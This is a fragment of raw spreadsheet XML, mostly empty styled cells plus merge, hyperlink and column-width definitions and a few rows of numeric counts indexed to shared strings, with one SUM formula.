      <c r="IR1021" s="69"/>
    </row>
    <row r="1022">
      <c r="IO1022" s="68"/>
      <c r="IQ1022" s="69"/>
      <c r="IR1022" s="69"/>
    </row>
    <row r="1023">
      <c r="IO1023" s="68"/>
      <c r="IQ1023" s="69"/>
      <c r="IR1023" s="69"/>
    </row>
    <row r="1024">
      <c r="IO1024" s="68"/>
      <c r="IQ1024" s="69"/>
      <c r="IR1024" s="69"/>
    </row>
    <row r="1025">
      <c r="IO1025" s="68"/>
      <c r="IQ1025" s="69"/>
      <c r="IR1025" s="69"/>
    </row>
    <row r="1026">
      <c r="IO1026" s="68"/>
      <c r="IQ1026" s="69"/>
      <c r="IR1026" s="69"/>
    </row>
    <row r="1027">
      <c r="IO1027" s="68"/>
      <c r="IQ1027" s="69"/>
      <c r="IR1027" s="69"/>
    </row>
    <row r="1028">
      <c r="IO1028" s="68"/>
      <c r="IQ1028" s="69"/>
      <c r="IR1028" s="69"/>
    </row>
    <row r="1029">
      <c r="IO1029" s="68"/>
      <c r="IQ1029" s="69"/>
      <c r="IR1029" s="69"/>
    </row>
    <row r="1030">
      <c r="IO1030" s="68"/>
      <c r="IQ1030" s="69"/>
      <c r="IR1030" s="69"/>
    </row>
    <row r="1031">
      <c r="IO1031" s="68"/>
      <c r="IQ1031" s="69"/>
      <c r="IR1031" s="69"/>
    </row>
    <row r="1032">
      <c r="IO1032" s="68"/>
      <c r="IQ1032" s="69"/>
      <c r="IR1032" s="69"/>
    </row>
    <row r="1033">
      <c r="IO1033" s="68"/>
      <c r="IQ1033" s="69"/>
      <c r="IR1033" s="69"/>
    </row>
    <row r="1034">
      <c r="IO1034" s="68"/>
      <c r="IQ1034" s="69"/>
      <c r="IR1034" s="69"/>
    </row>
    <row r="1035">
      <c r="IO1035" s="68"/>
      <c r="IQ1035" s="69"/>
      <c r="IR1035" s="69"/>
    </row>
    <row r="1036">
      <c r="IO1036" s="68"/>
      <c r="IQ1036" s="69"/>
      <c r="IR1036" s="69"/>
    </row>
    <row r="1037">
      <c r="IO1037" s="68"/>
      <c r="IQ1037" s="69"/>
      <c r="IR1037" s="69"/>
    </row>
    <row r="1038">
      <c r="IO1038" s="68"/>
      <c r="IQ1038" s="69"/>
      <c r="IR1038" s="69"/>
    </row>
    <row r="1039">
      <c r="IO1039" s="68"/>
      <c r="IQ1039" s="69"/>
      <c r="IR1039" s="69"/>
    </row>
    <row r="1040">
      <c r="IO1040" s="68"/>
      <c r="IQ1040" s="69"/>
      <c r="IR1040" s="69"/>
    </row>
    <row r="1041">
      <c r="IO1041" s="68"/>
      <c r="IQ1041" s="69"/>
      <c r="IR1041" s="69"/>
    </row>
    <row r="1042">
      <c r="IO1042" s="68"/>
      <c r="IQ1042" s="69"/>
      <c r="IR1042" s="69"/>
    </row>
    <row r="1043">
      <c r="IO1043" s="68"/>
      <c r="IQ1043" s="69"/>
      <c r="IR1043" s="69"/>
    </row>
    <row r="1044">
      <c r="IO1044" s="68"/>
      <c r="IQ1044" s="69"/>
      <c r="IR1044" s="69"/>
    </row>
    <row r="1045">
      <c r="IO1045" s="68"/>
      <c r="IQ1045" s="69"/>
      <c r="IR1045" s="69"/>
    </row>
    <row r="1046">
      <c r="IO1046" s="68"/>
      <c r="IQ1046" s="69"/>
      <c r="IR1046" s="69"/>
    </row>
    <row r="1047">
      <c r="IO1047" s="68"/>
      <c r="IQ1047" s="69"/>
      <c r="IR1047" s="69"/>
    </row>
    <row r="1048">
      <c r="IO1048" s="68"/>
      <c r="IQ1048" s="69"/>
      <c r="IR1048" s="69"/>
    </row>
    <row r="1049">
      <c r="IO1049" s="68"/>
      <c r="IQ1049" s="69"/>
      <c r="IR1049" s="69"/>
    </row>
    <row r="1050">
      <c r="IO1050" s="68"/>
      <c r="IQ1050" s="69"/>
      <c r="IR1050" s="69"/>
    </row>
    <row r="1051">
      <c r="IO1051" s="68"/>
      <c r="IQ1051" s="69"/>
      <c r="IR1051" s="69"/>
    </row>
    <row r="1052">
      <c r="IO1052" s="68"/>
      <c r="IQ1052" s="69"/>
      <c r="IR1052" s="69"/>
    </row>
    <row r="1053">
      <c r="IO1053" s="68"/>
      <c r="IQ1053" s="69"/>
      <c r="IR1053" s="69"/>
    </row>
    <row r="1054">
      <c r="IO1054" s="68"/>
      <c r="IQ1054" s="69"/>
      <c r="IR1054" s="69"/>
    </row>
    <row r="1055">
      <c r="IO1055" s="68"/>
      <c r="IQ1055" s="69"/>
      <c r="IR1055" s="69"/>
    </row>
    <row r="1056">
      <c r="IO1056" s="68"/>
      <c r="IQ1056" s="69"/>
      <c r="IR1056" s="69"/>
    </row>
    <row r="1057">
      <c r="IO1057" s="68"/>
      <c r="IQ1057" s="69"/>
      <c r="IR1057" s="69"/>
    </row>
    <row r="1058">
      <c r="IO1058" s="68"/>
      <c r="IQ1058" s="69"/>
      <c r="IR1058" s="69"/>
    </row>
    <row r="1059">
      <c r="IO1059" s="68"/>
      <c r="IQ1059" s="69"/>
      <c r="IR1059" s="69"/>
    </row>
    <row r="1060">
      <c r="IO1060" s="68"/>
      <c r="IQ1060" s="69"/>
      <c r="IR1060" s="69"/>
    </row>
    <row r="1061">
      <c r="IO1061" s="68"/>
      <c r="IQ1061" s="69"/>
      <c r="IR1061" s="69"/>
    </row>
    <row r="1062">
      <c r="IO1062" s="68"/>
      <c r="IQ1062" s="69"/>
      <c r="IR1062" s="69"/>
    </row>
    <row r="1063">
      <c r="IO1063" s="68"/>
      <c r="IQ1063" s="69"/>
      <c r="IR1063" s="69"/>
    </row>
    <row r="1064">
      <c r="IO1064" s="68"/>
      <c r="IQ1064" s="69"/>
      <c r="IR1064" s="69"/>
    </row>
    <row r="1065">
      <c r="IO1065" s="68"/>
      <c r="IQ1065" s="69"/>
      <c r="IR1065" s="69"/>
    </row>
    <row r="1066">
      <c r="IO1066" s="68"/>
      <c r="IQ1066" s="69"/>
      <c r="IR1066" s="69"/>
    </row>
    <row r="1067">
      <c r="IO1067" s="68"/>
      <c r="IQ1067" s="69"/>
      <c r="IR1067" s="69"/>
    </row>
    <row r="1068">
      <c r="IO1068" s="68"/>
      <c r="IQ1068" s="69"/>
      <c r="IR1068" s="69"/>
    </row>
    <row r="1069">
      <c r="IO1069" s="68"/>
      <c r="IQ1069" s="69"/>
      <c r="IR1069" s="69"/>
    </row>
    <row r="1070">
      <c r="IO1070" s="68"/>
      <c r="IQ1070" s="69"/>
      <c r="IR1070" s="69"/>
    </row>
    <row r="1071">
      <c r="IO1071" s="68"/>
      <c r="IQ1071" s="69"/>
      <c r="IR1071" s="69"/>
    </row>
    <row r="1072">
      <c r="IO1072" s="68"/>
      <c r="IQ1072" s="69"/>
      <c r="IR1072" s="69"/>
    </row>
    <row r="1073">
      <c r="IO1073" s="68"/>
      <c r="IQ1073" s="69"/>
      <c r="IR1073" s="69"/>
    </row>
    <row r="1074">
      <c r="IO1074" s="68"/>
      <c r="IQ1074" s="69"/>
      <c r="IR1074" s="69"/>
    </row>
    <row r="1075">
      <c r="IO1075" s="68"/>
      <c r="IQ1075" s="69"/>
      <c r="IR1075" s="69"/>
    </row>
    <row r="1076">
      <c r="IO1076" s="68"/>
      <c r="IQ1076" s="69"/>
      <c r="IR1076" s="69"/>
    </row>
    <row r="1077">
      <c r="IO1077" s="68"/>
      <c r="IQ1077" s="69"/>
      <c r="IR1077" s="69"/>
    </row>
    <row r="1078">
      <c r="IO1078" s="68"/>
      <c r="IQ1078" s="69"/>
      <c r="IR1078" s="69"/>
    </row>
    <row r="1079">
      <c r="IO1079" s="68"/>
      <c r="IQ1079" s="69"/>
      <c r="IR1079" s="69"/>
    </row>
    <row r="1080">
      <c r="IO1080" s="68"/>
      <c r="IQ1080" s="69"/>
      <c r="IR1080" s="69"/>
    </row>
    <row r="1081">
      <c r="IO1081" s="68"/>
      <c r="IQ1081" s="69"/>
      <c r="IR1081" s="69"/>
    </row>
    <row r="1082">
      <c r="IO1082" s="68"/>
      <c r="IQ1082" s="69"/>
      <c r="IR1082" s="69"/>
    </row>
    <row r="1083">
      <c r="IO1083" s="68"/>
      <c r="IQ1083" s="69"/>
      <c r="IR1083" s="69"/>
    </row>
    <row r="1084">
      <c r="IO1084" s="68"/>
      <c r="IQ1084" s="69"/>
      <c r="IR1084" s="69"/>
    </row>
    <row r="1085">
      <c r="IO1085" s="68"/>
      <c r="IQ1085" s="69"/>
      <c r="IR1085" s="69"/>
    </row>
    <row r="1086">
      <c r="IO1086" s="68"/>
      <c r="IQ1086" s="69"/>
      <c r="IR1086" s="69"/>
    </row>
    <row r="1087">
      <c r="IO1087" s="68"/>
      <c r="IQ1087" s="69"/>
      <c r="IR1087" s="69"/>
    </row>
    <row r="1088">
      <c r="IO1088" s="68"/>
      <c r="IQ1088" s="69"/>
      <c r="IR1088" s="69"/>
    </row>
    <row r="1089">
      <c r="IO1089" s="68"/>
      <c r="IQ1089" s="69"/>
      <c r="IR1089" s="69"/>
    </row>
    <row r="1090">
      <c r="IO1090" s="68"/>
      <c r="IQ1090" s="69"/>
      <c r="IR1090" s="69"/>
    </row>
    <row r="1091">
      <c r="IO1091" s="68"/>
      <c r="IQ1091" s="69"/>
      <c r="IR1091" s="69"/>
    </row>
    <row r="1092">
      <c r="IO1092" s="68"/>
      <c r="IQ1092" s="69"/>
      <c r="IR1092" s="69"/>
    </row>
    <row r="1093">
      <c r="IO1093" s="68"/>
      <c r="IQ1093" s="69"/>
      <c r="IR1093" s="69"/>
    </row>
    <row r="1094">
      <c r="IO1094" s="68"/>
      <c r="IQ1094" s="69"/>
      <c r="IR1094" s="69"/>
    </row>
    <row r="1095">
      <c r="IO1095" s="68"/>
      <c r="IQ1095" s="69"/>
      <c r="IR1095" s="69"/>
    </row>
    <row r="1096">
      <c r="IO1096" s="68"/>
      <c r="IQ1096" s="69"/>
      <c r="IR1096" s="69"/>
    </row>
    <row r="1097">
      <c r="IO1097" s="68"/>
      <c r="IQ1097" s="69"/>
      <c r="IR1097" s="69"/>
    </row>
    <row r="1098">
      <c r="IO1098" s="68"/>
      <c r="IQ1098" s="69"/>
      <c r="IR1098" s="69"/>
    </row>
    <row r="1099">
      <c r="IO1099" s="68"/>
      <c r="IQ1099" s="69"/>
      <c r="IR1099" s="69"/>
    </row>
    <row r="1100">
      <c r="IO1100" s="68"/>
      <c r="IQ1100" s="69"/>
      <c r="IR1100" s="69"/>
    </row>
    <row r="1101">
      <c r="IO1101" s="68"/>
      <c r="IQ1101" s="69"/>
      <c r="IR1101" s="69"/>
    </row>
    <row r="1102">
      <c r="IO1102" s="68"/>
      <c r="IQ1102" s="69"/>
      <c r="IR1102" s="69"/>
    </row>
  </sheetData>
  <mergeCells count="13">
    <mergeCell ref="G142:I143"/>
    <mergeCell ref="K142:Q143"/>
    <mergeCell ref="G146:I146"/>
    <mergeCell ref="K146:Q146"/>
    <mergeCell ref="G147:I147"/>
    <mergeCell ref="K147:Q147"/>
    <mergeCell ref="AK1:BU1"/>
    <mergeCell ref="BW1:DI1"/>
    <mergeCell ref="DM1:EY1"/>
    <mergeCell ref="FC1:GO1"/>
    <mergeCell ref="GU1:HI1"/>
    <mergeCell ref="HV1:IH1"/>
    <mergeCell ref="B142:E143"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="W73"/>
    <hyperlink r:id="rId2" ref="W121"/>
    <hyperlink r:id="rId3" ref="W126"/>
  </hyperlinks>
  <drawing r:id="rId4"/>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8.25"/>
    <col customWidth="1" min="2" max="6" width="27.25"/>
    <col customWidth="1" min="7" max="7" width="25.88"/>
    <col customWidth="1" min="8" max="8" width="25.25"/>
    <col customWidth="1" min="9" max="9" width="27.75"/>
    <col customWidth="1" min="10" max="10" width="24.75"/>
    <col customWidth="1" min="11" max="11" width="31.88"/>
    <col customWidth="1" min="12" max="12" width="26.38"/>
    <col customWidth="1" min="13" max="13" width="32.25"/>
    <col customWidth="1" min="14" max="16" width="24.88"/>
    <col customWidth="1" min="17" max="19" width="26.0"/>
    <col customWidth="1" min="21" max="21" width="56.5"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="229"/>
      <c r="B1" s="229"/>
      <c r="C1" s="229"/>
      <c r="D1" s="229"/>
      <c r="E1" s="229"/>
      <c r="F1" s="229"/>
      <c r="G1" s="230"/>
      <c r="H1" s="230"/>
      <c r="I1" s="51"/>
      <c r="J1" s="51"/>
      <c r="K1" s="51"/>
      <c r="L1" s="51"/>
      <c r="M1" s="51"/>
      <c r="N1" s="51"/>
      <c r="O1" s="51"/>
      <c r="P1" s="51"/>
      <c r="Q1" s="51"/>
      <c r="R1" s="51"/>
      <c r="S1" s="51"/>
      <c r="T1" s="230"/>
      <c r="U1" s="230"/>
    </row>
    <row r="2">
      <c r="A2" s="230"/>
      <c r="B2" s="230"/>
      <c r="C2" s="230"/>
      <c r="D2" s="230"/>
      <c r="E2" s="230"/>
      <c r="F2" s="230"/>
      <c r="G2" s="231" t="s">
        <v>6</v>
      </c>
      <c r="H2" s="222"/>
      <c r="I2" s="232" t="s">
        <v>7</v>
      </c>
      <c r="J2" s="5"/>
      <c r="K2" s="232" t="s">
        <v>8</v>
      </c>
      <c r="L2" s="5"/>
      <c r="M2" s="232" t="s">
        <v>9</v>
      </c>
      <c r="N2" s="5"/>
      <c r="O2" s="233" t="s">
        <v>20</v>
      </c>
      <c r="Q2" s="234" t="s">
        <v>63</v>
      </c>
      <c r="S2" s="235"/>
      <c r="T2" s="230"/>
      <c r="U2" s="230"/>
    </row>
    <row r="3" ht="32.25" customHeight="1">
      <c r="A3" s="236" t="s">
        <v>2359</v>
      </c>
      <c r="B3" s="237" t="s">
        <v>2360</v>
      </c>
      <c r="C3" s="237" t="s">
        <v>2361</v>
      </c>
      <c r="D3" s="237" t="s">
        <v>2362</v>
      </c>
      <c r="E3" s="237" t="s">
        <v>2363</v>
      </c>
      <c r="F3" s="237" t="s">
        <v>2364</v>
      </c>
      <c r="G3" s="237" t="s">
        <v>2365</v>
      </c>
      <c r="H3" s="237" t="s">
        <v>2366</v>
      </c>
      <c r="I3" s="236" t="s">
        <v>2365</v>
      </c>
      <c r="J3" s="237" t="s">
        <v>2366</v>
      </c>
      <c r="K3" s="236" t="s">
        <v>2365</v>
      </c>
      <c r="L3" s="237" t="s">
        <v>2366</v>
      </c>
      <c r="M3" s="236" t="s">
        <v>2365</v>
      </c>
      <c r="N3" s="237" t="s">
        <v>2366</v>
      </c>
      <c r="O3" s="236" t="s">
        <v>2365</v>
      </c>
      <c r="P3" s="237" t="s">
        <v>2366</v>
      </c>
      <c r="Q3" s="238" t="s">
        <v>2365</v>
      </c>
      <c r="R3" s="239" t="s">
        <v>2366</v>
      </c>
      <c r="S3" s="240" t="s">
        <v>2367</v>
      </c>
      <c r="T3" s="241"/>
      <c r="U3" s="241"/>
      <c r="V3" s="242"/>
      <c r="W3" s="242"/>
      <c r="X3" s="242"/>
    </row>
    <row r="4">
      <c r="A4" s="243" t="s">
        <v>2368</v>
      </c>
      <c r="B4" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C4" s="244" t="s">
        <v>2370</v>
      </c>
      <c r="D4" s="244" t="s">
        <v>2371</v>
      </c>
      <c r="E4" s="244">
        <v>2.0</v>
      </c>
      <c r="F4" s="244">
        <v>2.0</v>
      </c>
      <c r="G4" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H4" s="244">
        <v>0.0</v>
      </c>
      <c r="I4" s="245" t="s">
        <v>12</v>
      </c>
      <c r="J4" s="244">
        <v>0.0</v>
      </c>
      <c r="K4" s="245" t="s">
        <v>12</v>
      </c>
      <c r="L4" s="244">
        <v>0.0</v>
      </c>
      <c r="M4" s="246" t="s">
        <v>2372</v>
      </c>
      <c r="N4" s="244">
        <v>1.0</v>
      </c>
      <c r="O4" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P4" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q4" s="247" t="s">
        <v>12</v>
      </c>
      <c r="R4" s="247" t="s">
        <v>12</v>
      </c>
      <c r="S4" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T4" s="241"/>
      <c r="U4" s="241"/>
      <c r="V4" s="242"/>
      <c r="W4" s="242"/>
      <c r="X4" s="242"/>
    </row>
    <row r="5">
      <c r="A5" s="243" t="s">
        <v>2373</v>
      </c>
      <c r="B5" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C5" s="244" t="s">
        <v>2370</v>
      </c>
      <c r="D5" s="244" t="s">
        <v>2374</v>
      </c>
      <c r="E5" s="244">
        <v>61.0</v>
      </c>
      <c r="F5" s="244">
        <v>16.0</v>
      </c>
      <c r="G5" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H5" s="244">
        <v>0.0</v>
      </c>
      <c r="I5" s="245" t="s">
        <v>12</v>
      </c>
      <c r="J5" s="244">
        <v>0.0</v>
      </c>
      <c r="K5" s="245" t="s">
        <v>12</v>
      </c>
      <c r="L5" s="244">
        <v>0.0</v>
      </c>
      <c r="M5" s="244" t="s">
        <v>2298</v>
      </c>
      <c r="N5" s="244">
        <v>3.0</v>
      </c>
      <c r="O5" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P5" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q5" s="249">
        <v>9999.0</v>
      </c>
      <c r="R5" s="249">
        <v>1.0</v>
      </c>
      <c r="S5" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T5" s="241"/>
      <c r="U5" s="241"/>
      <c r="V5" s="242"/>
      <c r="W5" s="242"/>
      <c r="X5" s="242"/>
    </row>
    <row r="6">
      <c r="A6" s="243" t="s">
        <v>2375</v>
      </c>
      <c r="B6" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C6" s="244" t="s">
        <v>2370</v>
      </c>
      <c r="D6" s="244" t="s">
        <v>2376</v>
      </c>
      <c r="E6" s="244">
        <v>40.0</v>
      </c>
      <c r="F6" s="244">
        <v>17.0</v>
      </c>
      <c r="G6" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H6" s="244">
        <v>0.0</v>
      </c>
      <c r="I6" s="245" t="s">
        <v>12</v>
      </c>
      <c r="J6" s="244">
        <v>0.0</v>
      </c>
      <c r="K6" s="244">
        <v>51037.0</v>
      </c>
      <c r="L6" s="244">
        <v>1.0</v>
      </c>
      <c r="M6" s="244" t="s">
        <v>2377</v>
      </c>
      <c r="N6" s="244">
        <v>4.0</v>
      </c>
      <c r="O6" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P6" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q6" s="249" t="s">
        <v>12</v>
      </c>
      <c r="R6" s="249" t="s">
        <v>12</v>
      </c>
      <c r="S6" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T6" s="241"/>
      <c r="U6" s="241"/>
      <c r="V6" s="242"/>
      <c r="W6" s="242"/>
      <c r="X6" s="242"/>
    </row>
    <row r="7">
      <c r="A7" s="243" t="s">
        <v>2378</v>
      </c>
      <c r="B7" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C7" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D7" s="244" t="s">
        <v>2380</v>
      </c>
      <c r="E7" s="244">
        <v>15649.0</v>
      </c>
      <c r="F7" s="244">
        <v>2866.0</v>
      </c>
      <c r="G7" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H7" s="244">
        <v>0.0</v>
      </c>
      <c r="I7" s="245" t="s">
        <v>2381</v>
      </c>
      <c r="J7" s="244">
        <v>10.0</v>
      </c>
      <c r="K7" s="244" t="s">
        <v>2381</v>
      </c>
      <c r="L7" s="244" t="s">
        <v>12</v>
      </c>
      <c r="M7" s="244" t="s">
        <v>2382</v>
      </c>
      <c r="N7" s="244">
        <v>29.0</v>
      </c>
      <c r="O7" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P7" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q7" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R7" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S7" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T7" s="241"/>
      <c r="U7" s="241"/>
      <c r="V7" s="242"/>
      <c r="W7" s="242"/>
      <c r="X7" s="242"/>
    </row>
    <row r="8">
      <c r="A8" s="243" t="s">
        <v>2383</v>
      </c>
      <c r="B8" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C8" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D8" s="244" t="s">
        <v>2384</v>
      </c>
      <c r="E8" s="244">
        <v>3421.0</v>
      </c>
      <c r="F8" s="244">
        <v>715.0</v>
      </c>
      <c r="G8" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H8" s="244">
        <v>0.0</v>
      </c>
      <c r="I8" s="245" t="s">
        <v>2385</v>
      </c>
      <c r="J8" s="244">
        <v>2.0</v>
      </c>
      <c r="K8" s="244" t="s">
        <v>2385</v>
      </c>
      <c r="L8" s="244">
        <v>2.0</v>
      </c>
      <c r="M8" s="244" t="s">
        <v>2386</v>
      </c>
      <c r="N8" s="244">
        <v>14.0</v>
      </c>
      <c r="O8" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P8" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q8" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R8" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S8" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T8" s="241"/>
      <c r="U8" s="241"/>
      <c r="V8" s="242"/>
      <c r="W8" s="242"/>
      <c r="X8" s="242"/>
    </row>
    <row r="9">
      <c r="A9" s="243" t="s">
        <v>2387</v>
      </c>
      <c r="B9" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C9" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D9" s="244" t="s">
        <v>2388</v>
      </c>
      <c r="E9" s="244">
        <v>44016.0</v>
      </c>
      <c r="F9" s="244">
        <v>7531.0</v>
      </c>
      <c r="G9" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H9" s="244">
        <v>0.0</v>
      </c>
      <c r="I9" s="245" t="s">
        <v>2389</v>
      </c>
      <c r="J9" s="244">
        <v>5.0</v>
      </c>
      <c r="K9" s="244" t="s">
        <v>2389</v>
      </c>
      <c r="L9" s="244">
        <v>5.0</v>
      </c>
      <c r="M9" s="244" t="s">
        <v>2390</v>
      </c>
      <c r="N9" s="244">
        <v>20.0</v>
      </c>
      <c r="O9" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P9" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q9" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R9" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S9" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T9" s="241"/>
      <c r="U9" s="241"/>
      <c r="V9" s="242"/>
      <c r="W9" s="242"/>
      <c r="X9" s="242"/>
    </row>
    <row r="10">
      <c r="A10" s="243" t="s">
        <v>2391</v>
      </c>
      <c r="B10" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C10" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D10" s="244" t="s">
        <v>2392</v>
      </c>
      <c r="E10" s="244">
        <v>56302.0</v>
      </c>
      <c r="F10" s="244">
        <v>3096.0</v>
      </c>
      <c r="G10" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H10" s="244">
        <v>0.0</v>
      </c>
      <c r="I10" s="245" t="s">
        <v>2393</v>
      </c>
      <c r="J10" s="244">
        <v>3.0</v>
      </c>
      <c r="K10" s="244" t="s">
        <v>2393</v>
      </c>
      <c r="L10" s="244">
        <v>3.0</v>
      </c>
      <c r="M10" s="244" t="s">
        <v>2394</v>
      </c>
      <c r="N10" s="244">
        <v>20.0</v>
      </c>
      <c r="O10" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P10" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q10" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R10" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S10" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T10" s="241"/>
      <c r="U10" s="241"/>
      <c r="V10" s="242"/>
      <c r="W10" s="242"/>
      <c r="X10" s="242"/>
    </row>
    <row r="11">
      <c r="A11" s="243" t="s">
        <v>2395</v>
      </c>
      <c r="B11" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C11" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D11" s="244" t="s">
        <v>2396</v>
      </c>
      <c r="E11" s="244">
        <v>64674.0</v>
      </c>
      <c r="F11" s="244">
        <v>6565.0</v>
      </c>
      <c r="G11" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H11" s="244">
        <v>0.0</v>
      </c>
      <c r="I11" s="245" t="s">
        <v>2397</v>
      </c>
      <c r="J11" s="244">
        <v>4.0</v>
      </c>
      <c r="K11" s="244" t="s">
        <v>2397</v>
      </c>
      <c r="L11" s="244">
        <v>4.0</v>
      </c>
      <c r="M11" s="244" t="s">
        <v>2398</v>
      </c>
      <c r="N11" s="244">
        <v>19.0</v>
      </c>
      <c r="O11" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P11" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q11" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R11" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S11" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T11" s="241"/>
      <c r="U11" s="241"/>
      <c r="V11" s="242"/>
      <c r="W11" s="242"/>
      <c r="X11" s="242"/>
    </row>
    <row r="12">
      <c r="A12" s="243" t="s">
        <v>2399</v>
      </c>
      <c r="B12" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C12" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D12" s="244" t="s">
        <v>2400</v>
      </c>
      <c r="E12" s="244">
        <v>65257.0</v>
      </c>
      <c r="F12" s="244">
        <v>4702.0</v>
      </c>
      <c r="G12" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H12" s="244">
        <v>0.0</v>
      </c>
      <c r="I12" s="245" t="s">
        <v>2401</v>
      </c>
      <c r="J12" s="244">
        <v>5.0</v>
      </c>
      <c r="K12" s="244" t="s">
        <v>2401</v>
      </c>
      <c r="L12" s="244">
        <v>5.0</v>
      </c>
      <c r="M12" s="244" t="s">
        <v>2402</v>
      </c>
      <c r="N12" s="244">
        <v>24.0</v>
      </c>
      <c r="O12" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P12" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q12" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R12" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S12" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T12" s="241"/>
      <c r="U12" s="241"/>
      <c r="V12" s="242"/>
      <c r="W12" s="242"/>
      <c r="X12" s="242"/>
    </row>
    <row r="13">
      <c r="A13" s="243" t="s">
        <v>2403</v>
      </c>
      <c r="B13" s="244" t="s">
        <v>2369</v>
      </c>
      <c r="C13" s="244" t="s">
        <v>2379</v>
      </c>
      <c r="D13" s="244" t="s">
        <v>2404</v>
      </c>
      <c r="E13" s="244">
        <v>32428.0</v>
      </c>
      <c r="F13" s="244">
        <v>3104.0</v>
      </c>
      <c r="G13" s="245" t="s">
        <v>12</v>
      </c>
      <c r="H13" s="244">
        <v>0.0</v>
      </c>
      <c r="I13" s="245" t="s">
        <v>2397</v>
      </c>
      <c r="J13" s="244">
        <v>4.0</v>
      </c>
      <c r="K13" s="244" t="s">
        <v>2397</v>
      </c>
      <c r="L13" s="244">
        <v>4.0</v>
      </c>
      <c r="M13" s="244" t="s">
        <v>2405</v>
      </c>
      <c r="N13" s="244">
        <v>22.0</v>
      </c>
      <c r="O13" s="244" t="s">
        <v>12</v>
      </c>
      <c r="P13" s="244" t="s">
        <v>12</v>
      </c>
      <c r="Q13" s="250" t="s">
        <v>12</v>
      </c>
      <c r="R13" s="250" t="s">
        <v>12</v>
      </c>
      <c r="S13" s="248" t="s">
        <v>219</v>
      </c>
      <c r="T13" s="241"/>
      <c r="U13" s="241"/>
      <c r="V13" s="242"/>
      <c r="W13" s="242"/>
      <c r="X13" s="242"/>
    </row>
    <row r="14">
      <c r="A14" s="251" t="s">
        <v>2406</v>
      </c>
      <c r="B14" s="252" t="s">
        <v>2369</v>
      </c>
      <c r="C14" s="252" t="s">
        <v>2379</v>
      </c>
      <c r="D14" s="252" t="s">
        <v>2407</v>
      </c>
      <c r="E14" s="252"/>
      <c r="F14" s="252"/>
      <c r="G14" s="245" t="s">
        <v>2408</v>
      </c>
      <c r="H14" s="253">
        <v>60.0</v>
      </c>
      <c r="I14" s="245" t="s">
        <v>2409</v>
      </c>
      <c r="J14" s="253">
        <v>132.0</v>
      </c>
      <c r="K14" s="244" t="s">
        <v>2410</v>
      </c>
      <c r="L14" s="253">
        <v>283.0</v>
      </c>
      <c r="M14" s="244" t="s">
        <v>2411</v>
      </c>
      <c r="N14" s="253">
        <v>384.0</v>
      </c>
      <c r="O14" s="244"/>
      <c r="P14" s="244"/>
      <c r="Q14" s="254"/>
      <c r="R14" s="254" t="s">
        <v>2412</v>
      </c>
      <c r="S14" s="255"/>
      <c r="T14" s="230"/>
      <c r="U14" s="230"/>
    </row>
    <row r="15">
      <c r="A15" s="256" t="s">
        <v>2413</v>
      </c>
      <c r="B15" s="257" t="s">
        <v>12</v>
      </c>
      <c r="C15" s="257" t="s">
        <v>12</v>
      </c>
      <c r="D15" s="257" t="s">
        <v>12</v>
      </c>
      <c r="E15" s="257">
        <f t="shared" ref="E15:F15" si="1">SUM(E4:E13)</f>
        <v>281850</v>
      </c>
